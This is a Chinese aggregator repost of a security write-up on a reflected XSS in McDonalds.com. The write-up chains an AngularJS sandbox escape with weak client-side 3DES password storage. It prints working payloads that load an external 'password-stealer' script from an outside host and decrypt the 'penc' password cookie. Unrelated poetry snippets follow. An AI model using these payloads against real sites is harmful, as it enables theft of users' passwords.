今日看点

重磅:利用麦当劳网站的漏洞获取用户密码

发表于话题:大学生利用漏洞免费吃肯德基获刑
发布时间:2021-05-12

导读 本文讲述了利用不安全的加密存储(Insecure_Cryptographic_Storage)漏洞和服务端反射型XSS漏洞,实现对麦当劳网站(McDonalds.com)注册用户的密码窃取,进一步测试,还可能获取到网站注册用户的更多信息。

POC-利用反射型XSS漏洞绕过AngularJS框架沙箱

麦当劳网站McDonalds.com设置有一个搜索页面,该页面存在XSS反射型漏洞,可以返回搜索参数值,假设搜索参数q为***********-test-reflected-test-***********,对应链接:
https://www.mcdonalds.com/us/en-us/search-results.html?q=***********-test-reflected-test-***********

则执行效果如下:

麦当劳网站采用AngularJS框架,所以可以使用特殊字符在搜索区域进行返回值尝试。通过更改搜索参数q为{{$id}}之后,发现返回值对应AngularJS范围内的对应ID数字9:

Link used: https://www.mcdonalds.com/us/en-us/search-results.html?q={{$id}}

AngularJS是一个流行的JavaScript框架,通过这个框架可以把表达式放在花括号中嵌入到页面中。例如,表达式1+2={{1+2}}将会得到1+2=3。其中括号中的表达式被执行了,这就意味着,如果服务端允许用户输入的参数中带有花括号,我们就可以用Angular表达式来进行xss攻击。

由于AngularJS工作在沙箱模式,所以使用参数{{alert(1)}}无任何返回信息,但这并不代表AngularJS沙箱没有漏洞。在 AngularJS1.6版本中,由于沙箱机制不能很好地起到安全防护目的,已经被从源码中移除。而PortSwigger还对AngularJS的各版本沙箱进行了绕过测试,并给出了相应绕过执行命令。

在这里,我们来看看McDonalds.com使用的AngularJS版本,通过在浏览器控制端输入angular.version命令:

可以发现AngularJS为1.5.3版本,参照PortSwigger的测试,我们选用

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

作为搜索参数,很惊喜,返回值如下:

这就意味着,我们可以利用绕过命令,对网站加载外部JS脚本文件,如构造如下命令:

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://finnwea.com/snippets/external-alert.js`)');}}`

在内容安全策略(Content-Security-Policy)的提示下,第三方脚本文件被成功加载。

窃取密码

除此之外,我在麦当劳网站的注册页面发现了复选框“Remember my password”,通常来说,这只有在用户登录页面才存在,有点奇怪:

在该页面的源代码页面,包含了各种passowrd字段内容,甚至存在一个有趣的密码解密函数:

最危险的是,利用该解密函数代码竟然可以实现对客户端或双向加密存储的密码破解。尝试对发现的被存储Cookie值penc进行解密,竟然成功了!

而且,经分析发现,Cookie值penc的存储期限是大大的一年!LOL!

另外,以下的源码分析显示,麦当劳网站使用了Javascript的CryptoJS加密库进行信息加密,加密方式为3DES,其中加密参数key和iv都为通用,这意味着只需要获取到cookie值就能对密码解密:

由于AngularJS沙箱绕过方法只对charAt的join方法(charAt=[].join;$eval(‘x=alert(1)’))有效,所以即使我曾尝试在搜索区域构造其它恶意命令对cookie信息进行解密,但最终总是因为getCookie失败而无效。只有当charAt(0) 不为空时,getCookie才有返回值:

最后,我写了一段调用麦当劳网站首页框架进行cookie窃取的脚本,为了避免脚本因AngularJS沙箱被绕过而被反复执行,所以,我用window.xssIsExecuted对其进行了显示控制,如下:

if (!window.xssIsExecuted) { window.xssIsExecuted = true; var iframe = $('网址'>'); $('body').append(iframe); iframe.on('load', function() { var penc = iframe[0].contentWindow.getCookie('penc'); alert(iframe[0].contentWindow.decrypt(penc)); }); }

最终,配合以下AngularJS沙箱绕过命令,可以成功从cookie信息中对密码解密!

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://finnwea.com/snippets/mcdonalds-password-stealer.js`)');}}

遗憾的是,我曾多次与麦当劳官方就此问题进行联系,但是他们竟然都不回应!@#%¥&! ,所以我选择把此漏洞公开。

原文来自:http://www.tiejiang.org/16067.html

本文地址:http://www.linuxprobe.com/mcdonald-vulnerability-password.html

标签组:[麦当劳] [漏洞] [沙箱] [cookie] [angular

本文来源:https://www.kandian5.com/articles/12532.html

相关阅读

杜牧的文学成就:受到杜甫巨大影响

杜牧的文学创作有多方面的成就,诗、赋、古文都身趁名家,喜老庄道学。杜牧主张凡为文以意为主,以气为辅,以辞采章句为之兵卫,对作品内容与形式的关系有比较正确的理解。并能吸收、融化前人的长处,以形成自己特殊...

2025-07-30

杜牧《秋夕》赏析

《秋夕》是唐代诗人杜牧(一作王建)创作的一首七言绝句,是一首宫怨诗。这首诗描写一名孤单的宫女,于七夕之夜,仰望天河两侧的牛郎织女,不时扇扑流萤,排遣心中寂寞,反映了宫廷妇女不幸的命运,表现了一位官女举...

2025-07-30

《过华清宫绝句三首》其二鉴赏

《过华清宫绝句三首》赏析:其二新丰绿树起黄埃,数骑渔阳探使回。霓裳一曲千峰上,舞破中原始下来。唐玄宗时,安禄山兼任平卢、范阳、河东三镇节度使后伺机谋反,玄宗却对他十分宠信。皇太子和宰相杨国忠屡屡启奏,...

2025-07-30

杜牧《江南春》:多少楼台烟雨中

《江南春》是唐代诗人杜牧创作的一首七绝。诗中不仅描绘了明媚的江南春光,而且还再现了江南烟雨蒙蒙的楼台景色,使江南风光更加神奇迷离,别有一番情趣。迷人的江南,经过诗人生花妙笔的点染,显得更加令人心旌摇荡...

2025-07-30

杜牧《紫薇花》:咏物抒情

《紫薇花》是唐代诗人杜牧创作的一首七言绝句。诗的首句描绘新开之紫薇花,次句赞美其不争春,后两句用《史记》“桃李无言”典故,淡雅表现紫薇花高洁的风骨和谦逊的品格。这首诗设想入奇,扩大了诗的张力和戏剧效果...

2025-07-30

杜牧的经典代表作五首

1、《清明》唐代:杜牧清明时节雨纷纷,路上行人欲断魂。借问酒家何处有,牧童遥指杏花村。译文:江南清明时节细雨纷纷飘洒,路上羁旅行人个个落魄断魂。借问当地之人何处买酒浇愁?牧童笑而不答遥指杏花山村。2、...

2025-07-30

害群之马的成语典故

害群之马的意思 害群之马是一个汉语成语,读音是hài qún zhīmǎ,原指危害马群的劣马。现比喻危害社会或集体的人。出自《庄子·杂篇·徐无鬼》。害群之马的出处 《庄子·徐无鬼》:“夫为天下者,亦奚...

2025-07-30

伯乐相马的成语典故

伯乐相马的意思 伯乐相马是一个汉语成语,拼音是,意思是比喻善于识别人才,爱惜人才。伯乐相马的出处 汉·韩婴《韩诗外传》卷七:“使骥不得伯乐,安得千里之足。”唐·韩愈《马说》:“世有伯乐,然后有千里马。...

2025-07-30

朝秦暮楚的成语典故

朝秦暮楚的意思 朝秦暮楚是一个汉语成语,拼音是zhāo qín mùchǔ,意思是战国时期,秦楚两个诸侯大国相互对立,经常作战。有的诸侯小国为了保证自身的利益与安全,时而倾向秦,时而倾向楚。朝秦暮楚的...

2025-07-30

杜牧的作品集:《樊川文集》

杜牧有《樊川文集》二十卷,是其甥裴延翰所编,宋以后人又辑有《樊川外集》、《樊川别集》等等。四部丛刊本《樊川文集》二十卷、别集一卷、外集一卷,乃据翻宋雕本影印。又有清杨寿昌的景苏园影宋本,是杨守敬令书手...

2025-07-30